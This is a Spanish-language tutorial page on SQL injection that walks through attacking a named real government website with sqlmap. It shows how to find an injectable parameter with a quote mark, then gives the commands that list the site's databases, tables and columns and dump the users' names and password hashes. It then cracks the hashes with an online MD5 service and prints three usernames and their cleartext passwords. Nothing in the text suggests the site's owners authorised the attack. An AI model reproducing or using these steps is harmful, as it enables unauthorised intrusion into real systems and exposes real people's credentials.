Descarga la aplicación para disfrutar aún más
Vista previa del material en texto
Errores de SQL ¿Qué es un error de SQL? Es un error de sintaxis de una página web la cual nos permite penetrarla mediante una inyección de SQL, la cual es muy provechada para tener acceso a toda la base de datos de la web afectada con dicho ataque Este error lo podemos encontrar mediante las conocidas Dork de Google que son las más usadas para hallar este tipo de errores o utilizando un Scanner de vulnerabilidades web la cual es un método profesional de buscar diferentes tipos de errores. Las herramientas más conocida para penetrar las base de datos de una web son: Sqlmap Havij Webcruiser Acunetix Aprendiendo SQLMAP Primero buscamos una web " Vulnerable por Ejemplo” http://www.fonep.gob.ve/noticias.php Como verán dicha web se ve normal a simple vista pero no es asi, Pues hay un parámetro inyectable " Noticias.php?id=195” http://www.fonep.gob.ve/noticias.php?id=195 Como nos Damos cuenta que tiene una vulnerabilidad esta web? , pues es sencillo las vulnerabilidades son Bug que son Errores de Fuente que pueden ser Vulnerables a una penetración http://www.fonep.gob.ve/noticias.php?id=195 >> ' << le agregaremos esta comilla, Así Ejemplo http://www.fonep.gob.ve/noticias.php?id='195 http://img856.imageshack.us/img856/7529/17884101.png Miren Como la web nos vota todos los Errores del SQL Ahora Sabemos que la Web Esta 100 % Vulnerable Ahora La Inyectaremos Mediante " SqlMap” 1 - Abrimos SqlMapsaldra sus Toolz , en la terminal podemos lo siente ./sqlmap.py -u http://www.fonep.gob.ve/ noticias.php?id=195 --dbs http://img571.imageshack.us/img571/177/sano.png Como Vieron nos votó 2 Data Base, La opcional es Information_schema " lo que nos interesa es Esta " penof_cms” Ahora Pondremos Esto ./sqlmap.py -u http://www.fonep.gob.ve/ noticias.php?id=195 --dbs -D penof_cms–tables Como ven Nos Votó 20 Tablas " las Cual lo que nos interesa es el usuario " justamente en esa web Esta a Simple Vista " fonep_usuarios " Ahora Pondremos Esto ./sqlmap.py -u http://www.fonep.gob.ve/ noticias.php?id=195 -D penof_cms -T fonep_usuarios– columns Como verán nos votó 9 Columnas Entraremos a " id_usuarios " Pondremos esto ./sqlmap.py -u http://www.fonep.gob.ve/ noticias.php?id=195 -D penof_cms -T fonep_usuarios -C nombre_usuarios --dump Como vemos los usuarios son: -Ernesto -Luis -Sergio http://img534.imageshack.us/img534/745/77592636.png Ahora sacaremos la password de esas ID pondremos Esto ./sqlmap.py -u http://www.fonep.gob.ve/ noticias.php?id=195 -D penof_cms -T fonep_usuarios -C clave_usuarios --dump Como Verán Nos Vota 3 Claves, " Pero Están Encriptados ^^ " Para Ello Necesitamos Desencryptarlas Como esta en Extensión MD5 Podemos Desencryptarlas En Esta Web: http://www.md5decrypter.co.uk/ Las Claves Son: 3sert 54321abub resres
Compartir